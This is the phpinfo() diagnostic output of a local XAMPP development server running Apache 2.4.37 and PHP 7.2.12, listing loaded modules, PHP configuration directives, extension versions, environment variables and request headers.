Loaded Modules core mod_so http_core prefork mod_authn_file mod_authn_dbm mod_authn_anon mod_authn_dbd mod_authn_socache mod_authn_core mod_authz_host mod_authz_groupfile mod_authz_user mod_authz_dbm mod_authz_owner mod_authz_dbd mod_authz_core mod_authnz_ldap mod_access_compat mod_auth_basic mod_auth_form mod_auth_digest mod_allowmethods mod_file_cache mod_cache mod_cache_disk mod_socache_shmcb mod_socache_dbm mod_socache_memcache mod_dbd mod_bucketeer mod_dumpio mod_echo mod_case_filter mod_case_filter_in mod_buffer mod_ratelimit mod_reqtimeout mod_ext_filter mod_request mod_include mod_filter mod_substitute mod_sed mod_charset_lite mod_deflate mod_mime util_ldap mod_log_config mod_log_debug mod_logio mod_env mod_mime_magic mod_cern_meta mod_expires mod_headers mod_usertrack mod_unique_id mod_setenvif mod_version mod_remoteip mod_proxy mod_proxy_connect mod_proxy_ftp mod_proxy_http mod_proxy_fcgi mod_proxy_scgi mod_proxy_ajp mod_proxy_balancer mod_proxy_express mod_session mod_session_cookie mod_session_dbd mod_slotmem_shm mod_ssl mod_lbmethod_byrequests mod_lbmethod_bytraffic mod_lbmethod_bybusyness mod_lbmethod_heartbeat mod_unixd mod_dav mod_status mod_autoindex mod_info mod_suexec mod_cgi mod_cgid mod_dav_fs mod_vhost_alias mod_negotiation mod_dir mod_actions mod_speling mod_userdir mod_alias mod_rewrite mod_php7 mod_perl
DirectiveLocal ValueMaster Value
engine11
last_modified00
xbithack00

Apache Environment

VariableValue
UNIQUE_ID YDlOkssB3wvo4Pi5fDI0rwAAAAA
HTTP_HOST localhost
HTTP_USER_AGENT Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:84.0) Gecko/20100101 Firefox/84.0
HTTP_ACCEPT text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
HTTP_ACCEPT_LANGUAGE en-US,en;q=0.5
HTTP_ACCEPT_ENCODING gzip, deflate
HTTP_CONNECTION keep-alive
HTTP_UPGRADE_INSECURE_REQUESTS 1
HTTP_CACHE_CONTROL max-age=0
PATH /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin
LD_LIBRARY_PATH /opt/lampp/lib:/opt/lampp/lib
SERVER_SIGNATURE no value
SERVER_SOFTWARE Apache/2.4.37 (Unix) OpenSSL/1.0.2p PHP/7.2.12 mod_perl/2.0.8-dev Perl/v5.16.3
SERVER_NAME localhost
SERVER_ADDR 127.0.0.1
SERVER_PORT 80
REMOTE_ADDR 127.0.0.1
DOCUMENT_ROOT /opt/lampp/htdocs
REQUEST_SCHEME http
CONTEXT_PREFIX no value
CONTEXT_DOCUMENT_ROOT /opt/lampp/htdocs
SERVER_ADMIN you@example.com
SCRIPT_FILENAME /opt/lampp/htdocs/test.php
REMOTE_PORT 35610
GATEWAY_INTERFACE CGI/1.1
SERVER_PROTOCOL HTTP/1.1
REQUEST_METHOD GET
QUERY_STRING no value
REQUEST_URI /test.php
SCRIPT_NAME /test.php

HTTP Headers Information

HTTP Request Headers
HTTP Request GET /test.php HTTP/1.1
Host localhost
User-Agent Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:84.0) Gecko/20100101 Firefox/84.0
Accept text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language en-US,en;q=0.5
Accept-Encoding gzip, deflate
Connection keep-alive
Upgrade-Insecure-Requests 1
Cache-Control max-age=0
HTTP Response Headers
X-Powered-By PHP/7.2.12

bcmath

BCMath support enabled
DirectiveLocal ValueMaster Value
bcmath.scale00

bz2

BZip2 Support Enabled
Stream Wrapper support compress.bzip2://
Stream Filter support bzip2.decompress, bzip2.compress
BZip2 Version 1.0.6, 6-Sept-2010

calendar

Calendar support enabled

Core

PHP Version 7.2.12
DirectiveLocal ValueMaster Value
allow_url_fopenOnOn
allow_url_includeOffOff
arg_separator.input&&
arg_separator.output&&
auto_append_fileno valueno value
auto_globals_jitOnOn
auto_prepend_fileno valueno value
browscapno valueno value
default_charsetUTF-8UTF-8
default_mimetypetext/htmltext/html
disable_classesno valueno value
disable_functionsno valueno value
display_errorsOnOn
display_startup_errorsOnOn
doc_rootno valueno value
docref_extno valueno value
docref_rootno valueno value
enable_dlOffOff
enable_post_data_readingOnOn
error_append_stringno valueno value
error_log/opt/lampp/logs/php_error_log/opt/lampp/logs/php_error_log
error_prepend_stringno valueno value
error_reporting2252722527
expose_phpOnOn
extension_dir/opt/lampp/lib/php/extensions/no-debug-non-zts-20170718/opt/lampp/lib/php/extensions/no-debug-non-zts-20170718
file_uploadsOnOn
hard_timeout22
highlight.comment#FF8000#FF8000
highlight.default#0000BB#0000BB
highlight.html#000000#000000
highlight.keyword#007700#007700
highlight.string#DD0000#DD0000
html_errorsOnOn
ignore_repeated_errorsOffOff
ignore_repeated_sourceOffOff
ignore_user_abortOffOff
implicit_flushOffOff
include_path.:/opt/lampp/lib/php.:/opt/lampp/lib/php
input_encodingno valueno value
internal_encodingno valueno value
log_errorsOnOn
log_errors_max_len10241024
mail.add_x_headerOnOn
mail.force_extra_parametersno valueno value
mail.logno valueno value
max_execution_time60006000
max_file_uploads2020
max_input_nesting_level6464
max_input_time60006000
max_input_vars10001000
memory_limit1000M1000M
open_basedirno valueno value
output_buffering40964096
output_encodingno valueno value
output_handlerno valueno value
post_max_size128M128M
precision1414
realpath_cache_size4096K4096K
realpath_cache_ttl120120
register_argc_argvOffOff
report_memleaksOnOn
report_zend_debugOnOn
request_orderGPGP
sendmail_fromno valueno value
sendmail_path -t -i  -t -i 
serialize_precision100100
short_open_tagOnOn
SMTPlocalhostlocalhost
smtp_port2525
sys_temp_dirno valueno value
track_errorsOnOn
unserialize_callback_funcno valueno value
upload_max_filesize128M128M
upload_tmp_dir/opt/lampp/temp//opt/lampp/temp/
user_dirno valueno value
user_ini.cache_ttl300300
user_ini.filename.user.ini.user.ini
variables_orderGPCSGPCS
xmlrpc_error_number00
xmlrpc_errorsOffOff
zend.assertions11
zend.detect_unicodeOnOn
zend.enable_gcOnOn
zend.multibyteOffOff
zend.script_encodingno valueno value
zend.signal_checkOffOff

ctype

ctype functions enabled

curl

cURL support enabled
cURL Information 7.45.0
Age 3
Features
AsynchDNS No
CharConv No
Debug No
GSS-Negotiate No
IDN No
IPv6 Yes
krb4 No
Largefile Yes
libz Yes
NTLM Yes
NTLMWB Yes
SPNEGO No
SSL Yes
SSPI No
TLS-SRP Yes
HTTP2 No
GSSAPI No
KERBEROS5 No
UNIX_SOCKETS Yes
Protocols dict, file, ftp, ftps, gopher, http, https, imap, imaps, ldap, ldaps, pop3, pop3s, rtsp, smb, smbs, smtp, smtps, telnet, tftp
Host x86_64-pc-linux-gnu
SSL Version OpenSSL/1.0.2p
ZLib Version 1.2.11

date

date/time support enabled
timelib version 2017.08
"Olson" Timezone Database Version 2018.6
Timezone Database internal
Default timezone Europe/Berlin
DirectiveLocal ValueMaster Value
date.default_latitude31.766731.7667
date.default_longitude35.233335.2333
date.sunrise_zenith90.58333390.583333
date.sunset_zenith90.58333390.583333
date.timezoneEurope/BerlinEurope/Berlin

dba

DBA support enabled
Supported handlers gdbm cdb cdb_make inifile flatfile
DirectiveLocal ValueMaster Value
dba.default_handlerflatfileflatfile

dom

DOM/XML enabled
DOM/XML API Version 20031129
libxml Version 2.9.4
HTML Support enabled
XPath Support enabled
XPointer Support enabled
Schema Support enabled
RelaxNG Support enabled

exif

EXIF Support enabled
EXIF Version 7.2.12
Supported EXIF Version 0220
Supported filetypes JPEG, TIFF
Multibyte decoding support using mbstring enabled
Extended EXIF tag formats Canon, Casio, Fujifilm, Nikon, Olympus, Samsung, Panasonic, DJI, Sony, Pentax, Minolta, Sigma, Foveon, Kyocera, Ricoh, AGFA, Epson
DirectiveLocal ValueMaster Value
exif.decode_jis_intelJISJIS
exif.decode_jis_motorolaJISJIS
exif.decode_unicode_intelUCS-2LEUCS-2LE
exif.decode_unicode_motorolaUCS-2BEUCS-2BE
exif.encode_jisno valueno value
exif.encode_unicodeISO-8859-15ISO-8859-15

fileinfo

fileinfo support enabled
version 1.0.5
libmagic 531

filter

Input Validation and Filtering enabled
Revision $Id: 5a34caaa246b9df197f4b43af8ac66a07464fe4b $
DirectiveLocal ValueMaster Value
filter.defaultunsafe_rawunsafe_raw
filter.default_flagsno valueno value

ftp

FTP support enabled
FTPS support enabled

gd

GD Support enabled
GD Version bundled (2.1.0 compatible)
FreeType Support enabled
FreeType Linkage with freetype
FreeType Version 2.4.8
GIF Read Support enabled
GIF Create Support enabled
JPEG Support enabled
libJPEG Version 8
PNG Support enabled
libPNG Version 1.5.26
WBMP Support enabled
XBM Support enabled
DirectiveLocal ValueMaster Value
gd.jpeg_ignore_warning11

gettext

GetText Support enabled

hash

hash support enabled
Hashing Engines md2 md4 md5 sha1 sha224 sha256 sha384 sha512/224 sha512/256 sha512 sha3-224 sha3-256 sha3-384 sha3-512 ripemd128 ripemd160 ripemd256 ripemd320 whirlpool tiger128,3 tiger160,3 tiger192,3 tiger128,4 tiger160,4 tiger192,4 snefru snefru256 gost gost-crypto adler32 crc32 crc32b fnv132 fnv1a32 fnv164 fnv1a64 joaat haval128,3 haval160,3 haval192,3 haval224,3 haval256,3 haval128,4 haval160,4 haval192,4 haval224,4 haval256,4 haval128,5 haval160,5 haval192,5 haval224,5 haval256,5
MHASH support Enabled
MHASH API Version Emulated Support

iconv

iconv support enabled
iconv implementation glibc
iconv library version 1.15
DirectiveLocal ValueMaster Value
iconv.input_encodingno valueno value
iconv.internal_encodingno valueno value
iconv.output_encodingno valueno value

imap

IMAP c-Client Version 2007e
SSL Support enabled

intl

Internationalization supportenabled
version 1.1.0
ICU version 4.8.1.1
ICU Data version 4.8.1
ICU TZData version 2011k
ICU Unicode version 6.0
DirectiveLocal ValueMaster Value
intl.default_localeno valueno value
intl.error_level00
intl.use_exceptions00

json

json support enabled
json version 1.6.0

ldap

LDAP Support enabled
RCS Version $Id: 3839f871a91c293a52322c63329c68db23a0290a $
Total Links 0/unlimited
API Version 3001
Vendor Name OpenLDAP
Vendor Version 20421
DirectiveLocal ValueMaster Value
ldap.max_linksUnlimitedUnlimited

libxml

libXML support active
libXML Compiled Version 2.9.4
libXML Loaded Version 20904
libXML streams enabled

mbstring

Multibyte Support enabled
Multibyte string engine libmbfl
HTTP input encoding translation disabled
libmbfl version 1.3.2
oniguruma version 6.3.0
mbstring extension makes use of "streamable kanji code filter and converter", which is distributed under the GNU Lesser General Public License version 2.1.
Multibyte (japanese) regex support enabled
Multibyte regex (oniguruma) backtrack check On
Multibyte regex (oniguruma) version 6.3.0
DirectiveLocal ValueMaster Value
mbstring.detect_orderno valueno value
mbstring.encoding_translationOffOff
mbstring.func_overload00
mbstring.http_inputno valueno value
mbstring.http_outputno valueno value
mbstring.http_output_conv_mimetypes^(text/|application/xhtml\+xml)^(text/|application/xhtml\+xml)
mbstring.internal_encodingno valueno value
mbstring.languageneutralneutral
mbstring.strict_detectionOffOff
mbstring.substitute_characterno valueno value

mysqli

MysqlI Supportenabled
Client API library version mysqlnd 5.0.12-dev - 20150407 - $Id: 38fea24f2847fa7519001be390c98ae0acafe387 $
Active Persistent Links 0
Inactive Persistent Links 0
Active Links 0
DirectiveLocal ValueMaster Value
mysqli.allow_local_infileOnOn
mysqli.allow_persistentOnOn
mysqli.default_hostno valueno value
mysqli.default_port33063306
mysqli.default_pwno valueno value
mysqli.default_socket/opt/lampp/var/mysql/mysql.sock/opt/lampp/var/mysql/mysql.sock
mysqli.default_userno valueno value
mysqli.max_linksUnlimitedUnlimited
mysqli.max_persistentUnlimitedUnlimited
mysqli.reconnectOffOff
mysqli.rollback_on_cached_plinkOffOff

mysqlnd

mysqlndenabled
Version mysqlnd 5.0.12-dev - 20150407 - $Id: 38fea24f2847fa7519001be390c98ae0acafe387 $
Compression supported
core SSL supported
extended SSL supported
Command buffer size 4096
Read buffer size 32768
Read timeout 86400
Collecting statistics Yes
Collecting memory statistics Yes
Tracing n/a
Loaded plugins mysqlnd,debug_trace,auth_plugin_mysql_native_password,auth_plugin_mysql_clear_password,auth_plugin_sha256_password
API Extensions mysqli,pdo_mysql
mysqlnd statistics
bytes_sent 0
bytes_received 0
packets_sent 0
packets_received 0
protocol_overhead_in 0
protocol_overhead_out 0
bytes_received_ok_packet 0
bytes_received_eof_packet 0
bytes_received_rset_header_packet 0
bytes_received_rset_field_meta_packet 0
bytes_received_rset_row_packet 0
bytes_received_prepare_response_packet 0
bytes_received_change_user_packet 0
packets_sent_command 0
packets_received_ok 0
packets_received_eof 0
packets_received_rset_header 0
packets_received_rset_field_meta 0
packets_received_rset_row 0
packets_received_prepare_response 0
packets_received_change_user 0
result_set_queries 0
non_result_set_queries 0
no_index_used 0
bad_index_used 0
slow_queries 0
buffered_sets 0
unbuffered_sets 0
ps_buffered_sets 0
ps_unbuffered_sets 0
flushed_normal_sets 0
flushed_ps_sets 0
ps_prepared_never_executed 0
ps_prepared_once_executed 0
rows_fetched_from_server_normal 0
rows_fetched_from_server_ps 0
rows_buffered_from_client_normal 0
rows_buffered_from_client_ps 0
rows_fetched_from_client_normal_buffered 0
rows_fetched_from_client_normal_unbuffered 0
rows_fetched_from_client_ps_buffered 0
rows_fetched_from_client_ps_unbuffered 0
rows_fetched_from_client_ps_cursor 0
rows_affected_normal 0
rows_affected_ps 0
rows_skipped_normal 0
rows_skipped_ps 0
copy_on_write_saved 0
copy_on_write_performed 0
command_buffer_too_small 0
connect_success 0
connect_failure 0
connection_reused 0
reconnect 0
pconnect_success 0
active_connections 0
active_persistent_connections 0
explicit_close 0
implicit_close 0
disconnect_close 0
in_middle_of_command_close 0
explicit_free_result 0
implicit_free_result 0
explicit_stmt_close 0
implicit_stmt_close 0
mem_emalloc_count 0
mem_emalloc_amount 0
mem_ecalloc_count 0
mem_ecalloc_amount 0
mem_erealloc_count 0
mem_erealloc_amount 0
mem_efree_count 0
mem_efree_amount 0
mem_malloc_count 0
mem_malloc_amount 0
mem_calloc_count 0
mem_calloc_amount 0
mem_realloc_count 0
mem_realloc_amount 0
mem_free_count 0
mem_free_amount 0
mem_estrndup_count 0
mem_strndup_count 0
mem_estrdup_count 0
mem_strdup_count 0
mem_edupl_count 0
mem_dupl_count 0
proto_text_fetched_null 0
proto_text_fetched_bit 0
proto_text_fetched_tinyint 0
proto_text_fetched_short 0
proto_text_fetched_int24 0
proto_text_fetched_int 0
proto_text_fetched_bigint 0
proto_text_fetched_decimal 0
proto_text_fetched_float 0
proto_text_fetched_double 0
proto_text_fetched_date 0
proto_text_fetched_year 0
proto_text_fetched_time 0
proto_text_fetched_datetime 0
proto_text_fetched_timestamp 0
proto_text_fetched_string 0
proto_text_fetched_blob 0
proto_text_fetched_enum 0
proto_text_fetched_set 0
proto_text_fetched_geometry 0
proto_text_fetched_other 0
proto_binary_fetched_null 0
proto_binary_fetched_bit 0
proto_binary_fetched_tinyint 0
proto_binary_fetched_short 0
proto_binary_fetched_int24 0
proto_binary_fetched_int 0
proto_binary_fetched_bigint 0
proto_binary_fetched_decimal 0
proto_binary_fetched_float 0
proto_binary_fetched_double 0
proto_binary_fetched_date 0
proto_binary_fetched_year 0
proto_binary_fetched_time 0
proto_binary_fetched_datetime 0
proto_binary_fetched_timestamp 0
proto_binary_fetched_string 0
proto_binary_fetched_json 0
proto_binary_fetched_blob 0
proto_binary_fetched_enum 0
proto_binary_fetched_set 0
proto_binary_fetched_geometry 0
proto_binary_fetched_other 0
init_command_executed_count 0
init_command_failed_count 0
com_quit 0
com_init_db 0
com_query 0
com_field_list 0
com_create_db 0
com_drop_db 0
com_refresh 0
com_shutdown 0
com_statistics 0
com_process_info 0
com_connect 0
com_process_kill 0
com_debug 0
com_ping 0
com_time 0
com_delayed_insert 0
com_change_user 0
com_binlog_dump 0
com_table_dump 0
com_connect_out 0
com_register_slave 0
com_stmt_prepare 0
com_stmt_execute 0
com_stmt_send_long_data 0
com_stmt_close 0
com_stmt_reset 0
com_stmt_set_option 0
com_stmt_fetch 0
com_deamon 0
bytes_received_real_data_normal 0
bytes_received_real_data_ps 0

openssl

OpenSSL support enabled
OpenSSL Library Version OpenSSL 1.0.2p 14 Aug 2018
OpenSSL Header Version OpenSSL 1.0.2p 14 Aug 2018
Openssl default config /opt/lampp/share/openssl/openssl.cnf
DirectiveLocal ValueMaster Value
openssl.cafile/opt/lampp/share/curl/curl-ca-bundle.crt/opt/lampp/share/curl/curl-ca-bundle.crt
openssl.capathno valueno value

pcre

PCRE (Perl Compatible Regular Expressions) Support enabled
PCRE Library Version 8.41 2017-07-05
PCRE JIT Support enabled
DirectiveLocal ValueMaster Value
pcre.backtrack_limit10000001000000
pcre.jit11
pcre.recursion_limit100000100000

PDO

PDO supportenabled
PDO drivers mysql, pgsql, sqlite

pdo_mysql

PDO Driver for MySQLenabled
Client API version mysqlnd 5.0.12-dev - 20150407 - $Id: 38fea24f2847fa7519001be390c98ae0acafe387 $
DirectiveLocal ValueMaster Value
pdo_mysql.default_socket/opt/lampp/var/mysql/mysql.sock/opt/lampp/var/mysql/mysql.sock

pdo_pgsql

PDO Driver for PostgreSQLenabled
PostgreSQL(libpq) Version 9.2.4
Module version 7.2.12
Revision $Id: 9c5f356c77143981d2e905e276e439501fe0f419 $

pdo_sqlite

PDO Driver for SQLite 3.xenabled
SQLite Library 3.7.17

Phar

Phar: PHP Archive supportenabled
Phar EXT version 2.0.2
Phar API version 1.1.1
SVN revision $Id: 11c9d270a69dbd9589cbea10a0ad9731a286a147 $
Phar-based phar archives enabled
Tar-based phar archives enabled
ZIP-based phar archives enabled
gzip compression enabled
bzip2 compression enabled
OpenSSL support enabled
Phar based on pear/PHP_Archive, original concept by Davey Shafik.
Phar fully realized by Gregory Beaver and Marcus Boerger.
Portions of tar implementation Copyright (c) 2003-2009 Tim Kientzle.
DirectiveLocal ValueMaster Value
phar.cache_listno valueno value
phar.readonlyOnOn
phar.require_hashOnOn

posix

Revision $Id: 0a764bab332255746424a1e6cfbaaeebab998e4c $

Reflection

Reflectionenabled
Version $Id: f1096fbe817b0413895286a603375570e78fb553 $

session

Session Support enabled
Registered save handlers files user
Registered serializer handlers php_serialize php php_binary wddx
DirectiveLocal ValueMaster Value
session.auto_startOffOff
session.cache_expire180180
session.cache_limiternocachenocache
session.cookie_domainno valueno value
session.cookie_httponlyno valueno value
session.cookie_lifetime00
session.cookie_path//
session.cookie_secure00
session.gc_divisor10001000
session.gc_maxlifetime14401440
session.gc_probability11
session.lazy_writeOnOn
session.namePHPSESSIDPHPSESSID
session.referer_checkno valueno value
session.save_handlerfilesfiles
session.save_path/opt/lampp/temp//opt/lampp/temp/
session.serialize_handlerphpphp
session.sid_bits_per_character44
session.sid_length3232
session.upload_progress.cleanupOnOn
session.upload_progress.enabledOnOn
session.upload_progress.freq1%1%
session.upload_progress.min_freq11
session.upload_progress.namePHP_SESSION_UPLOAD_PROGRESSPHP_SESSION_UPLOAD_PROGRESS
session.upload_progress.prefixupload_progress_upload_progress_
session.use_cookies11
session.use_only_cookies11
session.use_strict_mode00
session.use_trans_sid00

shmop

shmop support enabled

SimpleXML

Simplexml supportenabled
Revision $Id: 341daed0ee94ea8f728bfd0ba4626e6ed365c0d1 $
Schema support enabled

soap

Soap Client enabled
Soap Server enabled
DirectiveLocal ValueMaster Value
soap.wsdl_cache11
soap.wsdl_cache_dir/tmp/tmp
soap.wsdl_cache_enabled11
soap.wsdl_cache_limit55
soap.wsdl_cache_ttl8640086400

sockets

Sockets Support enabled

SPL

SPL supportenabled
Interfaces OuterIterator, RecursiveIterator, SeekableIterator, SplObserver, SplSubject
Classes AppendIterator, ArrayIterator, ArrayObject, BadFunctionCallException, BadMethodCallException, CachingIterator, CallbackFilterIterator, DirectoryIterator, DomainException, EmptyIterator, FilesystemIterator, FilterIterator, GlobIterator, InfiniteIterator, InvalidArgumentException, IteratorIterator, LengthException, LimitIterator, LogicException, MultipleIterator, NoRewindIterator, OutOfBoundsException, OutOfRangeException, OverflowException, ParentIterator, RangeException, RecursiveArrayIterator, RecursiveCachingIterator, RecursiveCallbackFilterIterator, RecursiveDirectoryIterator, RecursiveFilterIterator, RecursiveIteratorIterator, RecursiveRegexIterator, RecursiveTreeIterator, RegexIterator, RuntimeException, SplDoublyLinkedList, SplFileInfo, SplFileObject, SplFixedArray, SplHeap, SplMinHeap, SplMaxHeap, SplObjectStorage, SplPriorityQueue, SplQueue, SplStack, SplTempFileObject, UnderflowException, UnexpectedValueException

sqlite3

SQLite3 supportenabled
SQLite3 module version 7.2.12
SQLite Library 3.7.17
DirectiveLocal ValueMaster Value
sqlite3.extension_dirno valueno value

standard

Dynamic Library Support enabled
Path to sendmail -t -i
DirectiveLocal ValueMaster Value
assert.active11
assert.bail00
assert.callbackno valueno value
assert.exception00
assert.quiet_eval00
assert.warning11
auto_detect_line_endings00
default_socket_timeout6060
fromno valueno value
session.trans_sid_hostsno valueno value
session.trans_sid_tagsa=href,area=href,frame=src,form=a=href,area=href,frame=src,form=
url_rewriter.hostsno valueno value
url_rewriter.tagsa=href,area=href,frame=src,input=src,form=fakeentrya=href,area=href,frame=src,input=src,form=fakeentry
user_agentno valueno value

sysvsem

Version 7.2.12

sysvshm

Version 7.2.12

tokenizer

Tokenizer Support enabled

wddx

WDDX Supportenabled
WDDX Session Serializer enabled

xml

XML Support active
XML Namespace Support active
libxml2 Version 2.9.4

xmlreader

XMLReader enabled

xmlrpc

core library version xmlrpc-epi v. 0.51
php extension version 7.2.12
author Dan Libby
homepage http://xmlrpc-epi.sourceforge.net
open sourced by Epinions.com

xmlwriter

XMLWriter enabled

xsl

XSL enabled
libxslt Version 1.1.29
libxslt compiled against libxml Version 2.9.4
EXSLT enabled
libexslt Version 1.1.29

zip

Zip enabled
Zip version 1.15.4
Libzip version 1.1.2

zlib

ZLib Supportenabled
Stream Wrapper compress.zlib://
Stream Filter zlib.inflate, zlib.deflate
Compiled Version 1.2.11
Linked Version 1.2.11
DirectiveLocal ValueMaster Value
zlib.output_compressionOffOff
zlib.output_compression_level-1-1
zlib.output_handlerno valueno value

Additional Modules

Module Name

Environment

VariableValue
SUDO_GID 1000
MAIL /var/mail/root
USER root
LANGUAGE en_US
LC_TIME sv_SE.UTF-8
TEXTDOMAIN xampp
LD_LIBRARY_PATH /opt/lampp/lib:/opt/lampp/lib
SHLVL 1
HOME /home/beneri
de false
GETTEXT /opt/lampp/bin/gettext
LC_MONETARY sv_SE.UTF-8
COLORTERM truecolor
SUDO_UID 1000
LOGNAME root
_ /opt/lampp/bin/apachectl
USERNAME root
TERM xterm-256color
PATH /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin
LC_ADDRESS sv_SE.UTF-8
DISPLAY :0
LANG en_US.UTF-8
LC_TELEPHONE sv_SE.UTF-8
LS_COLORS rs=0:di=01;34:ln=01;36:mh=00:pi=40;33:so=01;35:do=01;35:bd=40;33;01:cd=40;33;01:or=40;31;01:mi=00:su=37;41:sg=30;43:ca=30;41:tw=30;42:ow=34;42:st=37;44:ex=01;32:*.tar=01;31:*.tgz=01;31:*.arc=01;31:*.arj=01;31:*.taz=01;31:*.lha=01;31:*.lz4=01;31:*.lzh=01;31:*.lzma=01;31:*.tlz=01;31:*.txz=01;31:*.tzo=01;31:*.t7z=01;31:*.zip=01;31:*.z=01;31:*.Z=01;31:*.dz=01;31:*.gz=01;31:*.lrz=01;31:*.lz=01;31:*.lzo=01;31:*.xz=01;31:*.zst=01;31:*.tzst=01;31:*.bz2=01;31:*.bz=01;31:*.tbz=01;31:*.tbz2=01;31:*.tz=01;31:*.deb=01;31:*.rpm=01;31:*.jar=01;31:*.war=01;31:*.ear=01;31:*.sar=01;31:*.rar=01;31:*.alz=01;31:*.ace=01;31:*.zoo=01;31:*.cpio=01;31:*.7z=01;31:*.rz=01;31:*.cab=01;31:*.wim=01;31:*.swm=01;31:*.dwm=01;31:*.esd=01;31:*.jpg=01;35:*.jpeg=01;35:*.mjpg=01;35:*.mjpeg=01;35:*.gif=01;35:*.bmp=01;35:*.pbm=01;35:*.pgm=01;35:*.ppm=01;35:*.tga=01;35:*.xbm=01;35:*.xpm=01;35:*.tif=01;35:*.tiff=01;35:*.png=01;35:*.svg=01;35:*.svgz=01;35:*.mng=01;35:*.pcx=01;35:*.mov=01;35:*.mpg=01;35:*.mpeg=01;35:*.m2v=01;35:*.mkv=01;35:*.webm=01;35:*.ogm=01;35:*.mp4=01;35:*.m4v=01;35:*.mp4v=01;35:*.vob=01;35:*.qt=01;35:*.nuv=01;35:*.wmv=01;35:*.asf=01;35:*.rm=01;35:*.rmvb=01;35:*.flc=01;35:*.avi=01;35:*.fli=01;35:*.flv=01;35:*.gl=01;35:*.dl=01;35:*.xcf=01;35:*.xwd=01;35:*.yuv=01;35:*.cgm=01;35:*.emf=01;35:*.ogv=01;35:*.ogx=01;35:*.aac=00;36:*.au=00;36:*.flac=00;36:*.m4a=00;36:*.mid=00;36:*.midi=00;36:*.mka=00;36:*.mp3=00;36:*.mpc=00;36:*.ogg=00;36:*.ra=00;36:*.wav=00;36:*.oga=00;36:*.opus=00;36:*.spx=00;36:*.xspf=00;36:
XAUTHORITY /home/beneri/.Xauthority
SUDO_COMMAND /opt/lampp/lampp start
XAMPP_OS Linux
LC_NAME sv_SE.UTF-8
SHELL /bin/bash
SUDO_USER root
LC_MEASUREMENT sv_SE.UTF-8
LC_IDENTIFICATION sv_SE.UTF-8
XAMPP_ROOT /opt/lampp
PWD /home/beneri
LC_NUMERIC sv_SE.UTF-8
LC_PAPER sv_SE.UTF-8

PHP Variables

VariableValue
$_SERVER['UNIQUE_ID']YDlOkssB3wvo4Pi5fDI0rwAAAAA
$_SERVER['HTTP_HOST']localhost
$_SERVER['HTTP_USER_AGENT']Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:84.0) Gecko/20100101 Firefox/84.0
$_SERVER['HTTP_ACCEPT']text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
$_SERVER['HTTP_ACCEPT_LANGUAGE']en-US,en;q=0.5
$_SERVER['HTTP_ACCEPT_ENCODING']gzip, deflate
$_SERVER['HTTP_CONNECTION']keep-alive
$_SERVER['HTTP_UPGRADE_INSECURE_REQUESTS']1
$_SERVER['HTTP_CACHE_CONTROL']max-age=0
$_SERVER['PATH']/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin
$_SERVER['LD_LIBRARY_PATH']/opt/lampp/lib:/opt/lampp/lib
$_SERVER['SERVER_SIGNATURE']no value
$_SERVER['SERVER_SOFTWARE']Apache/2.4.37 (Unix) OpenSSL/1.0.2p PHP/7.2.12 mod_perl/2.0.8-dev Perl/v5.16.3
$_SERVER['SERVER_NAME']localhost
$_SERVER['SERVER_ADDR']127.0.0.1
$_SERVER['SERVER_PORT']80
$_SERVER['REMOTE_ADDR']127.0.0.1
$_SERVER['DOCUMENT_ROOT']/opt/lampp/htdocs
$_SERVER['REQUEST_SCHEME']http
$_SERVER['CONTEXT_PREFIX']no value
$_SERVER['CONTEXT_DOCUMENT_ROOT']/opt/lampp/htdocs
$_SERVER['SERVER_ADMIN']you@example.com
$_SERVER['SCRIPT_FILENAME']/opt/lampp/htdocs/test.php
$_SERVER['REMOTE_PORT']35610
$_SERVER['GATEWAY_INTERFACE']CGI/1.1
$_SERVER['SERVER_PROTOCOL']HTTP/1.1
$_SERVER['REQUEST_METHOD']GET
$_SERVER['QUERY_STRING']no value
$_SERVER['REQUEST_URI']/test.php
$_SERVER['SCRIPT_NAME']/test.php
$_SERVER['PHP_SELF']/test.php
$_SERVER['REQUEST_TIME_FLOAT']1614368402.139
$_SERVER['REQUEST_TIME']1614368402

PHP Credits

PHP Group
Thies C. Arntzen, Stig Bakken, Shane Caraveo, Andi Gutmans, Rasmus Lerdorf, Sam Ruby, Sascha Schumann, Zeev Suraski, Jim Winstead, Andrei Zmievski
Language Design & Concept
Andi Gutmans, Rasmus Lerdorf, Zeev Suraski, Marcus Boerger
PHP Authors
ContributionAuthors
Zend Scripting Language Engine Andi Gutmans, Zeev Suraski, Stanislav Malyshev, Marcus Boerger, Dmitry Stogov, Xinchen Hui, Nikita Popov
Extension Module API Andi Gutmans, Zeev Suraski, Andrei Zmievski
UNIX Build and Modularization Stig Bakken, Sascha Schumann, Jani Taskinen
Windows Support Shane Caraveo, Zeev Suraski, Wez Furlong, Pierre-Alain Joye, Anatol Belski, Kalle Sommer Nielsen
Server API (SAPI) Abstraction Layer Andi Gutmans, Shane Caraveo, Zeev Suraski
Streams Abstraction Layer Wez Furlong, Sara Golemon
PHP Data Objects Layer Wez Furlong, Marcus Boerger, Sterling Hughes, George Schlossnagle, Ilia Alshanetsky
Output Handler Zeev Suraski, Thies C. Arntzen, Marcus Boerger, Michael Wallner
Consistent 64 bit support Anthony Ferrara, Anatol Belski
SAPI Modules
ContributionAuthors
Apache 2.0 Handler Ian Holsman, Justin Erenkrantz (based on Apache 2.0 Filter code)
CGI / FastCGI Rasmus Lerdorf, Stig Bakken, Shane Caraveo, Dmitry Stogov
CLI Edin Kadribasic, Marcus Boerger, Johannes Schlueter, Moriyoshi Koizumi, Xinchen Hui
Embed Edin Kadribasic
FastCGI Process Manager Andrei Nigmatulin, dreamcat4, Antony Dovgal, Jerome Loyet
litespeed George Wang
phpdbg Felipe Pena, Joe Watkins, Bob Weinand
Module Authors
ModuleAuthors
BC Math Andi Gutmans
Bzip2 Sterling Hughes
Calendar Shane Caraveo, Colin Viebrock, Hartmut Holzgraefe, Wez Furlong
COM and .Net Wez Furlong
ctype Hartmut Holzgraefe
cURL Sterling Hughes
Date/Time Support Derick Rethans
